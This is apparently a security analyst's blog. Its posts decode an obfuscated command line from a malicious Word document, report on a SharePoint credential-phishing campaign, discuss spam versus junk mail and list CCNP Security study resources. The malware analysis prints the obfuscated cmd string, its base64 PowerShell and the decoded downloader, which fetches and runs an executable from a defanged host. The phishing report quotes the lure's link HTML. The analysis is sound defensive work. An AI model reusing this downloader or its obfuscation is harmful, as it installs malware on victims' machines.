Tech from the Trenches

Wednesday, August 22, 2018

Fun Little Decoding of Obfuscated CMD Line to Run PowerShell Cmd

This came from a malicious Word doc titled John_Townsend_Request.doc.
SHA256 e1a68aaba205c7b7336d4f19627f54f891f5bc504372e575941d38cbcab42546

Original Command Line Arguments:

Cmd /v^:^O ^ ^ /r s^e^T ^ ^ UMn^l^=p^ow)r^sh)l^l^ -)^ ^:^ABoA^#4Ad^Q^A9^A^#4^A`Q^B^3AC^0^A^bwB^iA^#oA^`QB^j^A^gQA^IABO^A#U^A^dA
Au^AFcA^`^Q^Bi^A(^MAb^A^BpA#^U^Ab^$^B0ADsA^:^A^B^p^A#^$^A.A^A9^ACcA^a^AB0
^Ag^Q^AcAA6AC8^A^LwB^j^A^#8A^b$^Bn^A#n^A)$BlA^gIAL^$^B^j^A#^8^A^b^Q^Av^A^g
QAc^w^B0^AC^8A^aQBu^A#^QA^`Q^B4AC4^Ac^A^BoA^g^A^APw^B^s^AD0AcwBvA^#$A^
bwA1AC4Ad^ABrA#4^A:^w^AuA^FM^Ac^A^B^sA^#nAdAA^o^ACc^AQ^A^A+^ACnAO^w^A
n^A#nAd^A^B^F^ACA^APQ^A$^ACcA^\^w^A^4A^D(^A^:^wA7AC^QA^S^$^B^gAgU^A^P^Q
An^A#UAb^$B2A^D^oAcA^B,^A#I^Ab^A^Bp^A^#MAKw^A^+AF^w^A:wArAC^Q^A^aQ^B^0
^A(^UAKwA+AC4A^`Q^B^4A#U^A^:w^A^7A#Y^Abw^B^yA#^UAY^QBjA#$^AK^A^AnA^FQ
^AR^A^B^6ACA^A^a^QBuAC^A^A^:^A^Bp^A#$A.AApAgs^AdAByAgn^A)^w^An^A#^$^Ab$
^B^,^AC^4^AR^ABv^AgcAb^$^B^sA^#8A^YQBn^A(^Y^AaQ^Bs^A^#UA^K^AAn^A^FQ^AR^
A^B^6^AC^wA^I^AAnA(^oAR^wB^,ACn^AO^w^B^:^A#4Ad^$^Bv^A^#s^A`Q^A^tA(nAdAB^l
^A#^0A^IAAn^A(^oAR^w^B^,^AD^sAY$^By^A#U^AY^Q^Br^A^D^sA^f^QB^jA#(Ad^ABjA^#$^A)^w^B^9A^g0A^I^AA$AC^A^A^I^A^A$^ACA^AI^AA^$ACAA^I^AA^$^ACA
A^I^AA$^ACA^A^IAA$AA^=^=& sE^t ^ ^ Z^s^Lm=^!^UMn^l^:n=^k!& s^E^t ^ Rv^y=^!^Z^s^Lm:^g^=H^!& s^E^T ch^a^m=!Rv^y^:\=N^!& sE^T ^ ^dm=^!ch^a^m^:^$=^g^!&&S^e^T ^ ^ ^M^m^xs=^!^d^m:)=^e^!&&S^eT ^ ^ ^ H^J^o=^!^M^m^xs^:1=^z!& se^t ^ ^ ^q^zy=^!^H^J^o^::^=^J!&&s^et ^ ^x^e5C=!^q^zy:`^=^Z^!&& s^e^T ^ ^ ^ ^K^6^8=^!^x^e^5C^:^,^=^1!& se^t ^ ^ ^68V=!^K^6^8:^+^=n^!& se^T ^ q^F=!^6^8V^:(^=^E^!&& s^e^t ^ ^ ^8lW^m=^!q^F^:^.^=^W^!& S^ET E^3=^!^8^l^W^m:^#^=G^!&&ca^L^L %E^3%

Step 1. Remove Filler Noise character "^"

Cmd /v:O /r seT UMnl=pow)rsh)ll -) :ABoA#4AdQA9A#4A`QB3AC0AbwBiA#oA`QBjAgQAIABOA#UAdAAuAFcA`QBiA(MAbABp
A#UAb$B0ADsA:ABpA#$A.AA9ACcAaAB0AgQAcAA6AC8ALwBjA#8Ab$BnA#nA)$BlAgIAL
$BjA#8AbQAvAgQAcwB0AC8AaQBuA#QA`QB4AC4AcABoAgAAPwBsAD0AcwBvA#$AbwA
1AC4AdABrA#4A:wAuAFMAcABsA#nAdAAoACcAQAA+ACnAOwAnA#nAdABFACAAPQA$
ACcA\wA4AD(A:wA7ACQAS$BgAgUAPQAnA#UAb$B2ADoAcAB,A#IAbABpA#MAKwA+A
FwA:wArACQAaQB0A(UAKwA+AC4A`QB4A#UA:wA7A#YAbwByA#UAYQBjA#$AKAAnAF
QARAB6ACAAaQBuACAA:ABpA#$A.AApAgsAdAByAgnA)wAnA#$Ab$B,AC4ARABvAgcA
b$BsA#8AYQBnA(YAaQBsA#UAKAAnAFQARAB6ACwAIAAnA(oARwB,ACnAOwB:A#4Ad
$BvA#sA`QAtA(nAdABlA#0AIAAnA(oARwB,ADsAY$ByA#UAYQBrADsAfQBjA#(AdABjA#$A)wB9Ag0AIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$AA==
& sEt ZsLm=!UMnl:n=k!& sEt Rvy=!ZsLm:g=H!& sET cham=!Rvy:\=N!& sET dm=!cham:$=g!&&SeT Mmxs=!dm:)=e!&&SeT HJo=!Mmxs:1=z!& set qzy=!HJo::=J!&&set xe5C=!qzy:`=Z!&& seT K68=!xe5C:,=1!& set 68V=!K68:+=n!& seT qF=!68V:(=E!&& set 8lWm=!qF:.=W!& SET E3=!8lWm:#=G!&&caLL %E3%

Step 2. Capture CMD line as it runs in Sandbox to get character substitutes

# = G
( and ) = E
` = Z
$ = g
n = k

powershell -e JABoAG4AdQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEM
AbABpAGUAbgB0ADsAJABpAGgAWAA9ACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBkAGk
AegBlAHIALgBjAG8AbQAvAHQAcwB0AC8AaQBuAGQAZQB4AC4AcABoAHAAPwBsAD0A
cwBvAGgAbwAzAC4AdABrAG4AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAGkA
dABFACAAPQAgACcANwA4ADEAJwA7ACQASgBHAHUAPQAkAGUAbgB2ADoAcAB1AGI
AbABpAGMAKwAnAFwAJwArACQAaQB0AEUAKwAnAC4AZQB4AGUAJwA7AGYAbwByA
GUAYQBjAGgAKAAkAFQARAB6ACAAaQBuACAAJABpAGgAWAApAHsAdAByAHkAewAk
AGgAbgB1AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFQARAB6ACwAIAAk
AEoARwB1ACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEoARwB1ADsAYgByAG
UAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACA
AIAAgACAAIAAgAA==

Step 3. Base64 Decode

$�h�n�u�=�n�e�w�-�o�b�j�e�c�t� �N�e�t�.�W�e�b�C�l�i�e�n�t�;�$�i�h�X�=�'�h�t�t�p�:�/�/�c�o�n�d�i�z�e�r�.�c�o�m�/�t�s�t�/�i�n�d�e�x�.�p�h�p�?�l�=�s�o�h�o�3�.�t�k�n�'�.�S�p�l�i�t�(�'
�@�'�)�;�$�i�t�E� �=� �'�7�8�1�'�;�$�J�G�u�=�$�e�n�v�:�p�u�b�l�i�c�+�'�\�'�+�$�i�t
�E�+�'�.�e�x�e�'�;�f�o�r�e�a�c�h�(�$�T�D�z� �i�n� �$�i�h�X�)�{�t�r�y�{�$�h�n�u�.�D�o�w�n�l�o�a�d�F�i�l�e�(�$
�T�D�z�,� �$�J�G�u�)�;�I�n�v�o�k�e�-�I�t�e�m� �$�J�G�u�;�b�r�e�a�k�;�}�c�a�t�c�h�{�}�}� � � � � � � � � � � � � � � � � �

Step 4 Remove spacer character "�"

(Decoded: $hnu=new-object Net.WebClient;$ihX='hxxp://condizer[.]com/tst/index.php?l=soho3.tkn'.Split('@');$itE = '781';$JGu=$env:public+'\'+$itE+'.exe';foreach($TDz in $ihX){try{$hnu.DownloadFile($TDz, $JGu);Invoke-Item $JGu;break;}catch{}} )

Tuesday, May 15, 2018

Sharepoint Email Phishing

Summary:

At about 12:33 PM Eastern an E-mail was delivered to multiple mailboxes within the company. These purported to be from an internal employee. The address was legitimate and was not obfuscated to hide a different originating address. There were at least two variations of the email. Both emails contained links to a malicious domain (sued[.]co[.]ke) Link was hidden behind an alternate text that said “DownloadAttachments”. Clicking the link would prompt some users to enter their email address and password.

The URL and parent domain were immediately added to the company's Umbrella solution to prevent any furtherDNS resolution to the domain when users click on the link.

The IP addresses that the link resolved to were added to the firewalls at all sites to be shunned.

It appears that approximately 35 – 40 users clicked on the link and entered credentials. All users that have contacted IT Support or HelpDesk have had their domain password changed.

Investigation leads to this email having come from an external IP address and not necessarily sent from an internal device. The Originating IP address in the email header is unknown by threat intel resources. The addresses is located in Illinois, coming from a VPN block that belongs to LogicWeb. There are no domains hosted at this IP.

The email body was created in Gmail as indicated by the tags around the source and the alternate text to the Sharepoint logo appears to be in Spanish: img alt="Resultado de imagen para sharepoint logo"

Known malicious sample download

SHA256 - f9e8e6107cb0ff5ad3b891ad99580aac57eaa8f519c8ba9baa9c779d4b6f68f8

File Type: HTML

Magic: HTML document text

SSDeep: 768:DHxjTggziQuAr7SpF9G9h919/ozio/InD:6GiQuAr7SpEozio/ID

File Size: 28.77 KB

Main detection: Trojan.HTML.Phishing

Domain Info

Domain Name: sued.co.ke

IP Addresses Resolved to:

· 208.91.199.87

· 162.213.252.60 <-- All our traffic was centered around this IP

Screenshot of the email:

E-Mail Message Sample 1 Header and Source

Received: from BN7xxxxxxx113.xxxxxxx.prod.outlook.com (2603:10b6:4:ae::39) by

DMxxxxxB4105.xxxxxx.prod.outlook.com with HTTPS via

DM5xxxx0.NAMxxx07.PROD.OUTLOOK.COM; Mon, 14 May 2018 16:33:27 +0000

Authentication-Results: domain.com; dkim=none (message not signed)

header.d=none;domain.com; dmarc=none action=none

header.from=<company name>;

From: "Dennis B. Manning" <dennis.manning@bioglobal.co>

To: "Dennis B. Manning" <dennis.manning@bioglobal.co>

Subject: INVOICE

Thread-Topic: INVOICE

X-MS-Exchange-Organization-MessageDirectionality: Originating

X-MS-Exchange-Organization-AuthSource: BN7PRxxxxmprd04.prod.outlook.com

X-MS-Exchange-Organization-AuthAs: Internal

X-MS-Exchange-Organization-AuthMechanism: 04

X-Originating-IP: [173.239.199.110]

X-MS-Exchange-Organization-Network-Message-Id: 61d1100c-e50e-4798-2591-08d5b9b868a9

X-MS-PublicTrafficType: Email

X-Microsoft-Exchange-Diagnostics: 1;BN7PR04MB4307;35:hYQ8ykDJvNTkVuzaeSsSAZpmmFrC1R5Ulntep7gMcSI/UhbDiIALU6UQOhBeYZY2UCllhTuswM3SWrmuDe6GIw==

Return-Path: dennis.manning@bioglobal.co

X-MS-Exchange-Organization-ExpirationStartTime: 14 May 2018 16:33:22.6051

(UTC)

X-MS-Exchange-Organization-ExpirationStartTimeReason: Original Submit

X-MS-Exchange-Organization-ExpirationInterval: 2:00:00:00.0000000

X-MS-Exchange-Organization-ExpirationIntervalReason: Original Submit

X-Microsoft-Antispam: UriScan:;BCL:0;PCL:0;

E-Mail Message Sample 2 Header and Source

Received: from BN7xxxx04.xxxxxxx4.prod.outlook.com (2603:10b6:4:ae::44) by

DxxxxxB4105.namprd04.prod.outlook.com with HTTPS via

DM5xxxx0115.NAxxx07.PROD.OUTLOOK.COM; Mon, 14 May 2018 16:34:11 +0000

Received: from BNxxxxxB4050.xxxxxx.prod.outlook.com (20.176.18.18) by

BN7Pxxxx04.xxxx4.prod.outlook.com (20.xx6.xx.155) with Microsoft SMTP

Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id

15.20.755.16; Mon, 14 May 2018 16:34:09 +0000

Authentication-Results: teijin.co.jp; dkim=none (message not signed)

header.d=none;teijin.co.jp; dmarc=none action=none

header.from=<Company name>;

From: "Dennis B. Manning" <dennis.manning@bioglobal.co>

To: "Dennis B. Manning" <dennis.manning@bioglobal.co>

Subject: INVOICE

Thread-Topic: INVOICE

Date: Mon, 14 May 2018 16:34:04 +0000

X-Originating-IP: [173.239.199.110]

E-Mail Body Source Code (interesting sections)

<a href="http://sued.co.ke/sharepoint/sharepoint/" rel="noopener noreferrer" id="LPlnk981628" class="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-OWAAutoLink gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-OWAAutoLink gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-OWAAutoLink OWAAutoLink" target="_blank" style="color:rgb(17,85,204)" previewremoved="true"><span id="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-m_2205792334074373374gmail-LPlnk375107" style="font-size:16px; background-color:transparent">DownloadAttachments</a>

First Query seen in SC

May 14 09:41:14 nnm: 10.x.x.101:53|10.x.x.111:53|17|7024|DNS Client Queries|PVS has observed this host perform a DNS lookup. The most recent DNS query performed was for: |sued.co.ke to the server at 10.x.x.111|

SecurityCenter Events

· 530 Web_Request events tracked by SC. Almost all were GET requests for .css files. The ones below were unique in the list of GET/POST events:

HTTP request detection|The following GET/POST request was observed:|DIP: 162.213.252.60:80 Type: POST;URI: /?wc-ajax=get_refreshed_fragments;Referer: http://sued.co.ke/sharepoint/sharepoint/Office%20365_files/SuiteServiceProxy.htm

Random Variations (showed up 4 or 5 times out of 140 events):

GET;URI: /s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXOhv.woff;

GET;URI: /sharepoint/sharepoint/Office%20365_files/shellwofficons_f991c945.woff;

Spam vs. Junk

...And what to do about it.

There is a difference between emails. There is spam and there is junk. Do you know the what the difference is? Junk is anything that comes from a legitimate source, usually in the form of a marketing email. Spam comes from a less-than ethical source and can take any form. Usually with the intent of getting a user to click on a link. The link can then lead to a variety of sites with varying purposes. If the email is a 'Phishing" email, then the intent is to get you to provide credentials or other sensitive information that can then be utilized by the threat actor to perform some nefarious action.

The other type of link is to provide you with a piece of malicious software and that is usually without your consent or knowledge. This can allow even more serious activity to take place on your system and with your data. In the rare case, the link will provide both a place to enter in credentials and a download to your system. In all three cases, company data and personal data are placed at great risk.

Junk mail on the other hand just fills your mailbox and provides you the activity of having to take time to delete it. Not nefarious, just a pain.

Training users to know the difference and how to respond to it can save a lot of work for the security analyst.

For instance, in Outlook there is an option to set up Junk E-mail Options. This can be a great tool for end users, but they must be trained on what it means to them and their daily mail habits. Not only junk will get caught by this, and new addresses need to be constantly added to the Safe Senders list.

Wednesday, March 21, 2018

Bring Out Your Dead, Bring Out Your Dead!

Well, as the title says; I am bringing out my dead. My dead blog that is. I have been away for a couple years and much has changed. I have progressed quite far now in my security field and have many new skills. I am hoping to share some of what I learn with you in what I hope will be an entertaining and educational way.
Progressing into malware analysis and will be sharing the results of that as far as samples I analyze and things I discover.
Also, have something to say about recent events. To start with; the 'SlingShot' campaing as discovered and named by Kaspersky. At a point earlier this month there was a report published by Kaspersky and it detailed activity targeting many Middle East Countries and some in Africa. It explained the hack was being done by hacking into Mikrotik routers. The main piece of malware being by the group has been dubbed Slingshot based on strings found by researchers.
Cyberscoop has now claimed that they have learned that Slingshot is actually and operation of the US military's Joint Special Operations Command which is a component of Special Operations and is aimed at members of terrorists organizations such as ISIS and al-Qaeda. The source that gave the information to Cyberscoop has expressed concern that the exposure of the campaign may result in both the loss of a valuable surveillance program and the endangerment of the lives of US soldiers.
Most likely the Slingshot infrastructure has been abandoned following the disclosure.
Who knows what the repercussions from this will be, only time will tell.

Saturday, May 2, 2015

List of Resources for CCNP Security Studies

List of Resources for CCNP Security Studies

(working on formatting)

Purpose

This document is one that seems to be needed currently. There is so much out there I am going to try and put together a list of all the resources that are currently available for pursuing the CCNP Security certifications. Some of these resources are free and some are paid. Some are not yet available. Please comment and feel free to make any suggestions. I do not intend for this to be a static or solo document. Any good resource for study is welcome.

Starting with the required exams and prerequisites.

Prerequisites

CCNA Security or valid CCSP or any CCIE certification can act as a prerequisite.

Required Exam(s)

Cisco Recommended Training

Implementing Cisco Secure Access Solutions (SISAS)

Implementing Cisco Threat Control Solutions (SITCS)

Implementing Cisco Edge Network Security Solutions (SENSS)

Implementing Cisco Secure Mobility Solutions (SIMOS)

(Paid resource) Videos available on Cisco Learning Network Premium Library

These are the video series that I have located in the Cisco Learning Network Premium Library. I marked which exam they relate to. Hopefully we will get a full play list put together to make it easier to locate for each exam.

Bring Your Own Device (BYOD) Overview Series SISAS 300-208

Implementing Cisco CWA Using Cisco IOS Software R… SISAS 300-208

Cloud Web Security Catalogue SENSS 300-206

Cisco IPS Design and Implementation Series SITCS 300-207

Cisco Adaptive Security Appliance (ASA) Catalogue SITCS SIMOS 300-207 300-209

Implementing FlexVPN Using Cisco IOS Software Rel. 15.… SIMOS 300-209

Implementing NGE Using Cisco IOS Software Rel. 15.… SIMOS 300-209

Implementing ACLs for IPv6 Using Cisco IOS Software R… SIMOS 300-209

Cisco GET VPN and Cisco DMVPN Series SIMOS 300-209

Implementing Generic Routing Encapsulation (GRE… SIMOS 300-209

Wireshark 1.10.0 Series SENSS 300-206

Cisco ASA 5500 Series Software Rel. 8.3(x) Series SENSS 300-206

Cisco Email Security Appliance (ESA) Catalogue SITCS 300-207

Cisco Web Security Appliance (WSA) Catalogue SITCS 300-207

CCIEv5 DMVPN Labs Workbook SIMOS

Introduction to Cisco Virtualized Platforms / ASA … SENSS 300-206

Cisco Cloud Web Security Series SITCS 300-207

Cisco TrustSec 3.0 Series SISAS 300-208

Cisco Security Manager (CSM) 4.5 Series SENSS 300-206

Cisco Firewall Design and High Availability Series SENSS 300-206

==========================================================================================================================================

(Free resource) IPExpert videos available on YouTube

These are free videos that are produced by IPExpert and are available on YouTube

Follow this link to the playlist:

CCNP Security Videos (SISAS, SENSS, SIMOS, SITCS) - YouTube

The videos include the following:

CCNP Security :: SISAS - AAA for Device Administration 23:16

CCNP Security SITCS Cisco ESA Overview 4:25

CCNP Security :: SIMOS - IKEv2 Site to Site ASA 20:35

CCNP Security :: SIMOS - Cryptography Basics 35:34

CCNP Security and CCIE Security Training Video :: IOS IPS (CLI) 45:31

CCNP Security :: SENSS - Management Access Configuration 21:19

CCNP Security :: SISAS - TrustSec Overview 7:49

CCNP Security :: SENSS - Cisco Prime 12:48

CCNP VOD Sample :: SECURE :: Traffic Planes 11:48

CCNP Security Training Video :: VPN High Availability - Failover :: – VPN 36:51

CCNP Security :: IKEv1 IPSec Site-to-Site Digital Certificates - Exam 642-648 – VPN 41:19

CCNP Security :: ASA Certificate Maps - Exam 642-648 - VPN

==========================================================================================================================================

(Paid resource) Cisco Press Official Study Guides

Not released. The publication dates have been moving target dates on these books so far. Everyone is anxiously awaiting the release.

CCNP Security SISAS 300-208 Official Cert Guide <-- UPDATE Kindle version is available
Hardcover - May 27, 2015 Available for pre-order only

CCNP Security SENSS 300-206 Official Cert Guide (Certification Guide)

Hardcover – August 9, 2015 Available for pre-order only

CCNP Security SIMOS 300-209 Official Cert Guide (Certification Guide)

Hardcover – September 21, 2015 Available for pre-order only

CCNP Security SENSS 300-206 Official Cert Guide (Certification Guide)

Hardcover – August 9, 2015 Available for pre-order only

==========================================================================================================================================

(Paid resource) CBT Nuggets Series

A good hint with CBT Nuggets is to sign up for the free week and download all the free lab resources for the videos. Some very useful information

Cisco Training Videos Online, CCNA Training Videos Online | CBT Nuggets

Cisco CCNP Security 300-208 SISAS

November 2014 with Keith Barker

Intermediate 5 Hrs 32 Mins

Cisco CCNP Security 300-209 SIMOS

July 2014 with Keith Barker

Intermediate 9 Hrs 14 Mins

Cisco CCNP Security VPN v2.0

October 2012 with Keith Barker

Intermediate 10 Hrs 33 Mins

Cisco CCNP Security Firewall

October 2012 with Keith Barker

Intermediate 13 Hrs 23 Mins

Cisco CCNA Security 640-554

September 2012 with Keith Barker

Intermediate 11 Hrs 27 Mins

Cisco CCNP Security 300-206 SENSS

June 2014 with Keith Barker

Advanced 10 Hrs 22 Mins

==========================================================================================================================================

(Partner status required) Cisco Partner Education Connection

These videos are all produced by Stormwind. When first posted they could be downloaded, but Stormwind complained and said that Cisco could not allow them to be downloaded which is too bad because they were formatted for tablets quite nicely. They still say download on the site, but that is no longer true.

SIMOS v1.0: Implementing Cisco Secure Mobility Solutions - Video Duration 11 Hours 25 Minutes

SENSS v1.0: Implementing Cisco Edge Network Security Solutions - Video Duration 12 Hours 6 Minutes

SITCS v1.0: Implementing Cisco Threat Control Solutions - Video Duration 12 Hours 35 Minutes

SISAS v1.0: Implementing Cisco Secure Access Solutions - Video Duration 12 Hours 58 Minutes

==========================================================================================================================================

More to come.....